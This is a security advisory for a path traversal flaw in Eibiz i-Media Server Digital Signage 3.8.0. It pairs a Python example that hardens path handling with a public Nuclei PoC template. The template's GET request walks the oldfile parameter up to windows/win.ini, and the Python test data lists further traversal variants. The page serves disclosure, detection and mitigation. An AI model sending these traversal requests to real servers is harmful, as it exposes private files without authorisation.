eibiz-lfi: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion

Date: 2025-08-01 | Affected software: Eibiz i-Media Server Digital Signage | PoC: public

Vulnerability description

Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
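The defect described above is a classic CWE-22 path traversal: a file name taken from a query parameter is joined onto a directory and opened without checking where the joined path ends up. The following Python is an added example, not Eibiz's code (the real i-Media Server handler is not available), and uses hypothetical names: safe_resolve(), serve_library_file() and demo() are stand-ins, and the library layout and request values in demo() are constructed for the illustration. It shows the mitigation side: decode the parameter, resolve it under the library root, and refuse anything that lands outside that root, including backslash, percent-encoded and double-encoded variants.

```python
"""Hardened path handling for a 'serve a library file by name' endpoint.

Added example, not Eibiz's code: serve_library_file() is a hypothetical
stand-in for a handler such as /dlibrary/null?oldfile=<name>, showing how
the oldfile value should be resolved and checked before it is opened.
"""
import os
import re
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested file name would escape the library root."""


def safe_resolve(base_dir: str, requested: str) -> str:
    """Return the absolute path of `requested` inside `base_dir`, or raise.

    Decodes twice to catch double-encoded dots (%252e), treats backslashes
    as separators (the template tags the product as Windows, where both are
    accepted), refuses absolute paths and drive letters outright, then
    realpath()s the result and checks it still lies under the root.
    """
    decoded = unquote(unquote(requested))
    if not decoded or "\x00" in decoded:
        raise TraversalError("empty or NUL-containing file name")
    normalized = decoded.replace("\\", "/")
    if os.path.isabs(normalized) or re.match(r"^[A-Za-z]:", normalized):
        raise TraversalError(f"absolute path not allowed: {requested!r}")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, normalized))
    # commonpath() is the check that matters: a plain string-prefix test
    # would wrongly accept /srv/library-private when the root is /srv/library.
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError(f"path escapes library root: {requested!r}")
    return candidate


def serve_library_file(base_dir: str, oldfile: str) -> bytes:
    """Read `oldfile` from the library; raises TraversalError or FileNotFoundError."""
    with open(safe_resolve(base_dir, oldfile), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Exercise the handler against a constructed library layout.

    Builds a temporary tree with one legitimate file inside the library root
    and one sensitive file just outside it, then records which requests are
    served, which are refused, and which are simply missing.
    """
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "library")
        os.makedirs(root)
        with open(os.path.join(root, "banner.png"), "wb") as fh:
            fh.write(b"PNG-DATA")
        with open(os.path.join(tmp, "secret.ini"), "wb") as fh:
            fh.write(b"[fonts]\n")
        # Constructed oldfile values: one legitimate, one absent, the rest traversal variants.
        requests = {
            "plain": "banner.png",
            "missing": "nosuch.png",
            "dotdot": "../secret.ini",
            "deep_dotdot": "../../../../../../secret.ini",
            "backslash": "..\\secret.ini",
            "url_encoded": "..%2fsecret.ini",
            "double_encoded": "%252e%252e%2fsecret.ini",
            "absolute": os.path.join(tmp, "secret.ini"),
        }
        for label, value in requests.items():
            try:
                results[label] = serve_library_file(root, value)
            except TraversalError:
                results[label] = "refused"
            except FileNotFoundError:
                results[label] = "missing"
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:15} -> {outcome!r}")
```

The separation between "refused" and "missing" is deliberate: a legitimate request for a file that does not exist should produce an ordinary not-found response, while a refused request is the event worth logging and alerting on, since it is exactly the pattern the Nuclei template above probes for.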

PoC code [public]

id: eibiz-lfi

info:
  name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
  reference:
    - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,eibiz,packetstorm,windows,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100b42e6a5532c6460e4fde7624f641a753a12ef1769a1ea9b0f676e0760465e3fb0220599e3aaec3b125629c1703a03c1a0a4c1b5ba964b90393b4c508edca3fe333ad:922c64590222798bb761d5b6d8e72950
